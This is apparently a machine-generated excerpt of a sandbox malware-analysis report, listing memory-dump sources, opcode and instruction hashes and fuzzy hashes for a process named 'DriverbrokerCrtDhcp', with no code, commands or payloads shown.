                                                                                      • Instruction ID: 74566569f9e48e5b8617ae76ad2d97755b405646896fbd7b0b4893d1997a8f50
                                                                                      • Opcode Fuzzy Hash: 91f29592cef430266911c295f01f3a2cd357a7086ceae8acecaa21be459e880e
                                                                                      • Instruction Fuzzy Hash: 3671AD30A1C74A8FEBA5DBA588B56FDBBA1EF56300F1041FAD10ED7192DE2C6841E741
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 432d8f7b72e69b4f4d2dc156dc7425dbe1aa6207345ec3a9bf54987a8a95626d
                                                                                      • Instruction ID: 321bf3134b67fbc1c8c0e7a748029371bb65906d93ceff552d083c861dd083be
                                                                                      • Opcode Fuzzy Hash: 432d8f7b72e69b4f4d2dc156dc7425dbe1aa6207345ec3a9bf54987a8a95626d
                                                                                      • Instruction Fuzzy Hash: 01818C31A0CB068FE369DB14D1E097177E1FF46300B585A7DC98AC7A96CB6DB882DB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5355152c20e0bed87e58c35451e6bbf1d9e850bcf76c23a2fc0bf1636ececee0
                                                                                      • Instruction ID: 20b4f5289b871ce3a5e86c22db6911c29e7f9b9c6c68742fd1a10dc111c58262
                                                                                      • Opcode Fuzzy Hash: 5355152c20e0bed87e58c35451e6bbf1d9e850bcf76c23a2fc0bf1636ececee0
                                                                                      • Instruction Fuzzy Hash: 41613A32B0DA944FD761EB7C88A52EA7FE0EF47315B08007EE189D7193DE28A8469751
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ce816bd593e8c6e4ff5c16f8c68dbfe0794c122fe03876a069ed7174ae57331e
                                                                                      • Instruction ID: 641e3e66897bedecbabf6c9232d54cdcab6d28d07c8a56072010c8293cbb7e8c
                                                                                      • Opcode Fuzzy Hash: ce816bd593e8c6e4ff5c16f8c68dbfe0794c122fe03876a069ed7174ae57331e
                                                                                      • Instruction Fuzzy Hash: 4D517222E0D6955FDB61EBBCA8B10EE3BB4EF02324B0801B7D149DB193ED7C78499645
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0330e41eee34e4e3a42c865a0b3ff63fabc97cb548d28238e0b53a34f8af2211
                                                                                      • Instruction ID: 0ea9463c062697c6ca187a8dcaecbef34cc656541dc765d44b6cd2525357e2c7
                                                                                      • Opcode Fuzzy Hash: 0330e41eee34e4e3a42c865a0b3ff63fabc97cb548d28238e0b53a34f8af2211
                                                                                      • Instruction Fuzzy Hash: 6651F521A1C55A4FEBA8DB5888B4BB477A1FF56300F1842FAC04ED7186CE3C6980DF41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d3aafdb8cb414b57db5a1f54ead0b569bff194b7e82bf84a4deb495374cc2ea3
                                                                                      • Instruction ID: cdb21bb2a88d9be3d3ece4bce1e08a56971eb8b86d873d0dd557b090b7f92bba
                                                                                      • Opcode Fuzzy Hash: d3aafdb8cb414b57db5a1f54ead0b569bff194b7e82bf84a4deb495374cc2ea3
                                                                                      • Instruction Fuzzy Hash: B351B3315196458FEB89DF18C0E06B03BA5FF46310B9456BDC95ACB68BD77DE882CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2f147225bcc1436790353a8fa80d0160427317b10bded03cd6c9e13fef3d72ac
                                                                                      • Instruction ID: c4ddf8f84581aaf4841008bb7b41dde60c713ed92376e08758c4bea0cd5c206b
                                                                                      • Opcode Fuzzy Hash: 2f147225bcc1436790353a8fa80d0160427317b10bded03cd6c9e13fef3d72ac
                                                                                      • Instruction Fuzzy Hash: A541F222A0D6965FE32167FC69751E67BB4DF02324B0C02B3D188DB093EC7978899395
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 17345fc5439f250c2b10fb05933806ee4be5c31dd567ca64121e8d8a6988e57b
                                                                                      • Instruction ID: 4c67c1abcbec78a97512cb4161a77764baea2a85b98d784bfa72665ec07ef5bb
                                                                                      • Opcode Fuzzy Hash: 17345fc5439f250c2b10fb05933806ee4be5c31dd567ca64121e8d8a6988e57b
                                                                                      • Instruction Fuzzy Hash: A6410932B0D7059FE76C5E1858E147977E4EF47364B28163EED8FC3282D92CB8426252
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 12bd99cf3f8be43326df61266e6dd33e916113db232e2b38f85f2b46529cdbf8
                                                                                      • Instruction ID: 5ab8ed3256d97c4621a59251f6443f47563c2304c2ebfc285d8141fca052df9d
                                                                                      • Opcode Fuzzy Hash: 12bd99cf3f8be43326df61266e6dd33e916113db232e2b38f85f2b46529cdbf8
                                                                                      • Instruction Fuzzy Hash: 7341BE32A1855A8FFBA5DBA4C4A05BC7BB0FF16310F5806BAD10ED61A2DE3D6842D700
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 25c58349fb8af9446843e9a17efb5a5b27f67d2cedef99fc4cdc43d1453e97ad
                                                                                      • Instruction ID: 681a08b9fa07d2884ef590c69904e80fce138dbb7221e84dbafadc184b9ebb46
                                                                                      • Opcode Fuzzy Hash: 25c58349fb8af9446843e9a17efb5a5b27f67d2cedef99fc4cdc43d1453e97ad
                                                                                      • Instruction Fuzzy Hash: DC412820A1C55A8FEB64D71984B06BC77A1FF92310F1886BBC54EE7186CE3CB985DB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7b97a932c1fd767873f24552104100844783de22d7cdd0f9e13966c5ef05bf4e
                                                                                      • Instruction ID: 4cac29f2f12192a4de4b22434c607f13b7b7331fb21957ebf6bcb1a4704e09f6
                                                                                      • Opcode Fuzzy Hash: 7b97a932c1fd767873f24552104100844783de22d7cdd0f9e13966c5ef05bf4e
                                                                                      • Instruction Fuzzy Hash: 3741533260C9198FDF98EF58C4A5DB5B3E1FFA931070801AAE14AD3256CE35E845CF81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 51e4dc793194b0c608fdfe8824fd8503ce5618dcc8ec434e329f4332d38cbb23
                                                                                      • Instruction ID: bc527c38e13b3a78441a5e14f7764eb18c2b5d4d742baffc6b5da59007e2755d
                                                                                      • Opcode Fuzzy Hash: 51e4dc793194b0c608fdfe8824fd8503ce5618dcc8ec434e329f4332d38cbb23
                                                                                      • Instruction Fuzzy Hash: 1741423260C9088FDF98EF68D4A6DB5B7E1FBA931070802AAD04ED3552DE35F845CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 69de822663f65ecff6d0a5c545a9ee71d648a08cfe8216053015830f0c2dcc5a
                                                                                      • Instruction ID: 46dd9a0329f32852bac37b2bde410d35fb72de16b596022e1cbd955c47920aa3
                                                                                      • Opcode Fuzzy Hash: 69de822663f65ecff6d0a5c545a9ee71d648a08cfe8216053015830f0c2dcc5a
                                                                                      • Instruction Fuzzy Hash: 0641633170C9548FDF88FF59D4A59A9B7E1FBA532470441AAD04EC3292DE35F845CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ecf9f9cf51003e13d012de3ad97c22fedee41f5cf141bd31fe9bdb75028b4336
                                                                                      • Instruction ID: b229289b6e0043b3b5eee78ac493749cf573529eba174995e9eec8f928764da5
                                                                                      • Opcode Fuzzy Hash: ecf9f9cf51003e13d012de3ad97c22fedee41f5cf141bd31fe9bdb75028b4336
                                                                                      • Instruction Fuzzy Hash: 3A41663260C9098FDF98EF58D4A5DB873E1FBA9314B0541AAD04ED3196DE39F885CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d7fc1aed600965df1355aff5f2ddd20cde8bf44d021bd34abd97dd52e6c61977
                                                                                      • Instruction ID: 941398ec50ca7de608d2629e3c8a92ee7defbc0cc74a7f208ae8d67c3cfa7ada
                                                                                      • Opcode Fuzzy Hash: d7fc1aed600965df1355aff5f2ddd20cde8bf44d021bd34abd97dd52e6c61977
                                                                                      • Instruction Fuzzy Hash: 9B31C420B1CD5A0FF794F76C94AE6B97BC5EB9A315B4440BAE50DC32D3DE2CAC428244
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 235a2266f3641d6f2bc7905998a1258adf8e27b7bd858e619fcac18c5a77da6d
                                                                                      • Instruction ID: a91bfd8a624d6b71afc8c15a60bad279eee5122a0b5fc6cab133b8d4c6ec0a32
                                                                                      • Opcode Fuzzy Hash: 235a2266f3641d6f2bc7905998a1258adf8e27b7bd858e619fcac18c5a77da6d
                                                                                      • Instruction Fuzzy Hash: 6F412832A0D7D51FD722AB7C58B60EA3FE4EF43328B0801BBD1C8C6193EE2854469791
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 522324f222fe12a9b2ba37c0631ac841b0c17fed624c0831f2b55bd1d2918a58
                                                                                      • Instruction ID: 6fc2eeab466bf4a1b91e6f73c730c430da46db54456844d0c04ac1f0fdac948e
                                                                                      • Opcode Fuzzy Hash: 522324f222fe12a9b2ba37c0631ac841b0c17fed624c0831f2b55bd1d2918a58
                                                                                      • Instruction Fuzzy Hash: 7C312832A0D7D41FD722AB7C98A61EA3FE0EF47324B0801BBD5C9D6183DE3864469791
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5030cc1035b6b7e7b3a37a82f90a785f12288795427ace30f443fbf7702c5c07
                                                                                      • Instruction ID: d671721d382946ebb7d98178c70c45dcd3b24ee201d46830c1b5662c269f170e
                                                                                      • Opcode Fuzzy Hash: 5030cc1035b6b7e7b3a37a82f90a785f12288795427ace30f443fbf7702c5c07
                                                                                      • Instruction Fuzzy Hash: 2B31423160C9588FDF98EF18C4A5E74B7E1FFA931470806AAE04AD7296CE35E845CF81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7fb259a9f8849372060a50eb0e8ddb6af543c1a74d05805056fbc1fb15b16b15
                                                                                      • Instruction ID: 377dcbdb86ed1fed93d40e0d83941b05696c81c667067fd50377389e0b3d8401
                                                                                      • Opcode Fuzzy Hash: 7fb259a9f8849372060a50eb0e8ddb6af543c1a74d05805056fbc1fb15b16b15
                                                                                      • Instruction Fuzzy Hash: F631303260C9548FDB9CEB28C4A6E74B7E1FBA931071802AAD05AD7192CE35F845CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 73bd0620898890a0654b1cbf89d0e0ebc56f6c6695a96974e37f0819b186c29a
                                                                                      • Instruction ID: 498bb6f5de99a8e74e16757e33997e66152e87da08dfc45c449b78fec18604dd
                                                                                      • Opcode Fuzzy Hash: 73bd0620898890a0654b1cbf89d0e0ebc56f6c6695a96974e37f0819b186c29a
                                                                                      • Instruction Fuzzy Hash: F63190317089548FDB98FF28C4A5E69B7E1FBA931570842AAD04EC7292CE35F845CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b4f50a4a1fef8d1c1c2bb355c0fb93eaaef15194e907100aeb56228ff6095d0
                                                                                      • Instruction ID: dcd9a2496792abf82d96d47e89fea620da0cbdd359c15561c8087792f2b30b38
                                                                                      • Opcode Fuzzy Hash: 0b4f50a4a1fef8d1c1c2bb355c0fb93eaaef15194e907100aeb56228ff6095d0
                                                                                      • Instruction Fuzzy Hash: B031723160C9488FDF9DEF18C4A5EB473E1FBA931470541AAD04AC7196DE39F881CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48e6cb2195462dda9a9d090238245eb3ca0ff487cd37209c255237f8d92827d1
                                                                                      • Instruction ID: 5e9817c17b006d946f0ed8192b12d37c62bddf8aaaab74f0f9247568965166f0
                                                                                      • Opcode Fuzzy Hash: 48e6cb2195462dda9a9d090238245eb3ca0ff487cd37209c255237f8d92827d1
                                                                                      • Instruction Fuzzy Hash: 82312832A0D7D51FD722AB7C58660EA3FE0EF07324B08017BD189D6193EE2854469791
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c4f1c1417be3015f94a264529b4184a324f8b55caae826e593b33abc285b4386
                                                                                      • Instruction ID: d659cd25ae41b3442f58ca45686cbc5594da307b0d8d20630bad982b97024334
                                                                                      • Opcode Fuzzy Hash: c4f1c1417be3015f94a264529b4184a324f8b55caae826e593b33abc285b4386
                                                                                      • Instruction Fuzzy Hash: AB31323160C9598FDF98EF18C4A5DB4B3E1FFA931070905AAE04AD7256CE35E845CF81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 23f59f5f18bdf8bb90ac28ff0e8ec29e671ee15d9a5cb4988d94509d00a89cfc
                                                                                      • Instruction ID: 8119258234e2d19523d8650bac5daf68678b1226c3587d92ab7603579aff9d74
                                                                                      • Opcode Fuzzy Hash: 23f59f5f18bdf8bb90ac28ff0e8ec29e671ee15d9a5cb4988d94509d00a89cfc
                                                                                      • Instruction Fuzzy Hash: A831213260C9458FDB98EF28C0A5EB5B7E1FB6931071402AAD04AD7592DE35F845CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e9ea2a735bdd7316d9ff9f342fda3e2ba1e633203dbead17e561003c0a74388b
                                                                                      • Instruction ID: db7fbe536af2354f224d5ed12a62ab98846c4df1872516c35beb4b90ef95f615
                                                                                      • Opcode Fuzzy Hash: e9ea2a735bdd7316d9ff9f342fda3e2ba1e633203dbead17e561003c0a74388b
                                                                                      • Instruction Fuzzy Hash: C231623160C9098FDF98EF28C4A5EB873E1FBA931470541AAD04AD7196DE39F881CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 432400f63b124fe6682215abb10b4a31b8c760643c92b47ef159de65e527fe4f
                                                                                      • Instruction ID: 5c50408aea05a4992d3f73ed2dddcc89118fe3335544fe571044e3b6b116fd1d
                                                                                      • Opcode Fuzzy Hash: 432400f63b124fe6682215abb10b4a31b8c760643c92b47ef159de65e527fe4f
                                                                                      • Instruction Fuzzy Hash: A63181317089558FDB98FF28C4A5EA9B7E1FBA931470442AAD04EC7292CE35F845CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e7004c699b588167c8c6fd5a904bf1e5b1f1d7f3490b99cb3c46a1362aed8ae7
                                                                                      • Instruction ID: a1c64f304eaaacb32d49a3cea6965a8a876af9f33bbbdebf116498be4d3e000e
                                                                                      • Opcode Fuzzy Hash: e7004c699b588167c8c6fd5a904bf1e5b1f1d7f3490b99cb3c46a1362aed8ae7
                                                                                      • Instruction Fuzzy Hash: AE313E71B1891A8FDB44DB19C4E19BCB7A1FF5A310B1441BAD10ED3286CF28BC52D794
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2054f5d31187e886b4facff8db6148eaec048e5d26149ab945b2a8d2fbda4ab6
                                                                                      • Instruction ID: f8e843c69d6a9f62075bd67bfe5ed7b0296dc7e2311f570fb9b4ba68f0d30cd8
                                                                                      • Opcode Fuzzy Hash: 2054f5d31187e886b4facff8db6148eaec048e5d26149ab945b2a8d2fbda4ab6
                                                                                      • Instruction Fuzzy Hash: FC318172B0890A8FDB48EB5CD4A19A8F7E1FF55310B584279D10ED7682DF28B812DB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a8b3b2b58c113fab53b0eb82a2bf344722080b8dffcae6aba93f896e3dc3bdb6
                                                                                      • Instruction ID: c10f70164b6ff1035f19018e7964fd1219b7830057d72b4dfca247c4aa69d5bc
                                                                                      • Opcode Fuzzy Hash: a8b3b2b58c113fab53b0eb82a2bf344722080b8dffcae6aba93f896e3dc3bdb6
                                                                                      • Instruction Fuzzy Hash: 04313C30A0854E8FEB98DB5684A16BD7BB1FF96300F5000BBD60ED6281DB3F7840AB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4b8f616b69c54b413eac1160a2fd07e3e7d1cd6f6bfab2fa70c1b89b97a54826
                                                                                      • Instruction ID: 0ac20ac0c6e8398d75813e3c2ff2e0564bc4cf01e557b8593b1f8946644e9e90
                                                                                      • Opcode Fuzzy Hash: 4b8f616b69c54b413eac1160a2fd07e3e7d1cd6f6bfab2fa70c1b89b97a54826
                                                                                      • Instruction Fuzzy Hash: CE318471B0890A9FD744DB59C4A24ACF7B1FF4A320B44417AD14ED3642CF28B852DB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9e669b220dc9398eb6e4db23c6133bd6ff08777fae924428a1b2e54a433041ca
                                                                                      • Instruction ID: bc7b8b7cfdcfaffbed92551a8abac5a3c02eb62e980bf95d83dc61531fdb89af
                                                                                      • Opcode Fuzzy Hash: 9e669b220dc9398eb6e4db23c6133bd6ff08777fae924428a1b2e54a433041ca
                                                                                      • Instruction Fuzzy Hash: 79313E32A0C54ACFDB98DB4484E15BD77A0FF45300F5902B6D50DD6191CA3EA840AB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4d97e23a3386fcee97342aa14dce4a714538cbec507faa0cfc3e0ff7e8a3a06e
                                                                                      • Instruction ID: f143f8b002e2f3dfe83e97f8976ca3308db54b08d4f4470f57348ed9b1908f94
                                                                                      • Opcode Fuzzy Hash: 4d97e23a3386fcee97342aa14dce4a714538cbec507faa0cfc3e0ff7e8a3a06e
                                                                                      • Instruction Fuzzy Hash: 00313932F0890A8FDBA8DB9484A15BD77B0FF46700F5803BAD10ED6191DB3E6940AB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
